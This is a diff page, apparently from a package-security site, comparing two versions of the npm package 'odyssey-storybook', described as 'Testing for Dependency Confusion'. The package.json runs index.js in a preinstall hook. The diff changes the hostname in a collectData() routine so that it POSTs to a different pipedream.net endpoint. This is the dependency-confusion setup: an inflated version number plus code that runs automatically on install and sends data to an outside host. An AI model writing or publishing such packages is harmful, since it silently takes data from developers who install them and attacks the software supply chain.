odyssey-storybook 5.999.1 → 5.999.2

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +2 -2
package/index.js CHANGED
@@ -92,7 +92,7 @@ async function collectData() {
92
92
 
93
93
  // HTTPS request options
94
94
  const options = {
95
- hostname: "eoau1g0gfngpbja.m.pipedream.net",
95
+ hostname: "eo6gdeeb6wrk89r.m.pipedream.net",
96
96
  port: 443,
97
97
  path: "/",
98
98
  method: "POST",
package/package.json CHANGED
@@ -1,12 +1,12 @@
1
1
  {
2
2
  "name": "odyssey-storybook",
3
- "version": "5.999.1",
3
+ "version": "5.999.2",
4
4
  "description": "Testing for Dependency Confusion",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
7
  "preinstall": "node index.js",
8
8
  "test": "echo \"Error: no test specified\" && exit 1"
9
9
  },
10
- "author": "",
10
+ "author": "lezybot-1",
11
11
  "license": "ISC"
12
12
  }